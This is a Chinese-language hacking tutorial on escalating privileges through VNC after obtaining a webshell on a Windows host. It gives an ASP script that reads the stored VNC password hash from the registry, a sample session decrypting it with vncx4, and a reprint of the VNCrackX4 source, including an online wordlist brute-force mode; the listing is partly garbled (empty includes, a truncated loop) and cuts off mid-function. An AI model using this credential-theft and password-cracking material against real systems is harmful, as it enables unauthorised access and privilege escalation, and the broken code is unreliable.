很多时候大家提升权限一般用SERVU,或是找到sa帐户密码等。其实除了这个VNC一般也是以最高权限运行的,而且是图形界面,功能和远程终端类似。
如果得到了一个主机的WEBSHELL,想提升权限,发现主机运行了VNC服务,就可以考虑用下面的方法。
默认情况下VNC服务端的密码是放在注册表中的,本文只针对这种情况。
首先用ASP读出注册表中的加密密码,然后用破解工具破解。
我给出大家一个读取VNC密码的ASP脚本,默认情况下VNC密码存放在HKCU\Software\ORL\WinVNC3\Password
Set WshShell = server.CreateObject("WScript.Shell")
bkey=WSHShell.RegRead("HKCU\Software\ORL\WinVNC3\Password")
for each str in bkey
response.write hex(str)
next
读取出来后结果类似 49 40 15 F9 A3 5E 8B 22这种十六进制,这是VNC加密的密码。我们可以用vncx4
破解它,vncx4使用很简单,只要在命令行下输入
c:\>vncx4 -W
然后顺序输入上面的每一个十六进制数据,没输完一个回车一次就行了。
比如我给个测试
H:\tool>vncx4 -W
49
40
15
F9
A3
5E
8B
22
Entered HEX String: 49 40 15 f9 a3 5e 8b 22
VNC Password: 123456
好,我把这个工具的源代码和编译程序给出来,编译程序在最下面。
/* Project code: vncrack for windows (vnx4)
*
* FX <fx@phenoelit.de>
* Phenoelit (http://www.phenoelit.de/)
* (c) 2k
*
* Blocking delay idea by Stonneway.
*/
#include
#include
#include
file://#include
#include
#include "d3des.h"
#include "vncauth.h"
extern unsigned char fixedkey[8];
#define SPLASH "VNCrackX4 - by Phenoelit (http://www.phenoelit.de/)\n"
int verbose=0,lbf=0;
char *schallange=NULL, *sresponse=NULL;
void interactive(void);
void cr_crack(char *wordlist);
void *sec_malloc(size_t size) {
void *p;
if ((p=malloc(size))==NULL) {
fprintf(stderr,"malloc() failed for %d bytes\n",size);
exit (-1);
}
memset(p,0,size);
return p;
}
void usage(void) {
printf("VNCrackX4\n"
"by Phenoelit (http://www.phenoelit.de/)\n\n"\
"Usage:\n"
"Online: ./vncrack -h target.host.com -w wordlist.txt [-opt's]\n"
"Windows interactive mode: ./vncrack -W \n"
"\tenter hex key one byte per line - find it in\n"
"\t\\HKEY_CURRENT_USER\\Software\\ORL\\WinVNC3\\Password or\n"
"\t\\HKEY_USERS\\.DEFAULT\\Software\\ORL\\WinVNC3\\Password\n\n"
"Options for online mode:\n"
"-v\tverbose (repeat -v for more)\n"
"-p P\tconnect to port P instead of 5900\n"
"Options for PHoss intercepted challages:\n"
"-c \tchallange from PHoss output\n"
"-r \tresponse from PHoss output\n"
);
exit(-1);
}
void sleep(DWORD ms) {
DWORD t1;
t1=GetTickCount();
while (GetTickCount()<(t1+ms));
}
int main(int argc, char **argv) {
int sfd; /* socket */
unsigned long dest_ip;
struct sockaddr_in dest_addr;
char *rbuf;
unsigned char atype[4];
unsigned char challange[16];
char *vnchost=NULL;
u_short vncport=5900;
int i,ani=0;
char *wordlist=NULL;
FILE *fd;
char *tryword;
char servertext[255];
char *sthelp;
int conwait=90;
int redocount=0;
int redosleep=10;
/* check the command line options */
for (i=1;i switch (argv[i][1]) {
case 'v': // verbose
verbose++;
break;
case 'p':
if (argv[++i]==NULL) usage();
if ((vncport=atoi(argv[i]))==0) {
fprintf(stderr,"wrong port number: %s\n",argv[i]);
exit (-1);
}
break;
case 'h':
if (argv[++i]==NULL) usage();
vnchost=(char *)sec_malloc(strlen(argv[i])+1);
strcpy(vnchost,argv[i]);
break;
case 'w':
if (argv[++i]==NULL) usage();
wordlist=(char *)sec_malloc(strlen(argv[i])+1);
strcpy(wordlist,argv[i]);
break;
case 'W':
interactive();
break;
case 'c':
if (argv[++i]==NULL) usage();
schallange=(char *)sec_malloc(strlen(argv[i])+1);
strcpy(schallange,argv[i]);
break;
case 'r':
if (argv[++i]==NULL) usage();
sresponse=(char *)sec_malloc(strlen(argv[i])+1);
strcpy(sresponse,argv[i]);
break;
case 'R':
if (argv[++i]==NULL) usage();
redosleep=atoi(argv[i]);
break;
default:
usage();
}
}
if (schallange||sresponse) {
printf(SPLASH);
cr_crack(wordlist); /* exit is done here */
}
if (!(vnchost&&vncport&&wordlist)) usage();
printf(SPLASH);
/* host */
dest_ip=inet_addr(vnchost);
memcpy(&dest_addr.sin_addr,&dest_ip,sizeof(dest_ip));
dest_addr.sin_port=htons(vncport);
dest_addr.sin_family=AF_INET;
/* make sure we can talk WinSock
Comment: I like to enclose this, because it is SO UGLY */
{
WORD wVersionRequested;
WSADATA wsaData;
int err;
wVersionRequested = MAKEWORD(1, 1);
err = WSAStartup(wVersionRequested, &wsaData);
if (err != 0) {
fprintf(stderr,"Unable to start networking");
exit (-1);
}
} // WSA and GO
if ((fd=fopen(wordlist,"rt"))==NULL) {
fprintf(stderr,"Unable to open wordlist %s\n",wordlist);
exit (-1);
}
tryword=sec_malloc(256);
while (fgets(tryword,255,fd)!=NULL) {
/* cut the word */
if (tryword[strlen(tryword)-1]=='\n') tryword[strlen(tryword)-1]='\0';
ReDoClosed:
if (verbose) {
printf("\ntrying '%s' ...",tryword);
fflush(stdout);
}
if ((sfd=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET) {
fprintf(stderr,"Unable to get a socket");
exit (-1);
}
if (connect(sfd,(struct sockaddr *)&dest_addr,sizeof(dest_addr))!=0) {
fprintf(stderr,"Connect failed (%d).\n",WSAGetLastError());
exit(-1);
}
/* connunication starts with server->client version packet */
rbuf=sec_malloc(100);
if (recv(sfd,rbuf,100,0)<0) {
fprintf(stderr,"recv()");
exit(-1);
}
if (verbose>1) printf("\nServer Protocol version: %s",rbuf);
/* bounce this message back - so the server will continue */
if (send(sfd,rbuf,strlen(rbuf),0)<0) {
fprintf(stderr,"send()");
exit(-1);
}
if (recv(sfd,atype,sizeof(atype),0)<0) {
fprintf(stderr,"recv()");
exit(-1);
}
if (verbose>1) {
printf("Authentication type: ");
for (i=0;i<4;i++) { printf("%x ",atype[i]); }
printf("\n");
}
switch (atype[3]) {
case 0:
fprintf(stderr,"Server told me: connection close\n");
if (verbose) {
// try to retrieve the reason
memset(servertext,0,sizeof(servertext));
if (recv(sfd,servertext,sizeof(servertext),0)<0) {
fprintf(stderr,"recv() in verbose");
exit(-1);
} else {
sthelp=servertext;
sthelp+=4;
fprintf(stderr,"Server says: %s\n",sthelp);
}
if (verbose) printf("\tWaiting for blocking disable\n");
Sleep(redosleep*1000);
if ((redocount++)<3) {
goto ReDoClosed;
} else {
fprintf(stderr,"\tgiving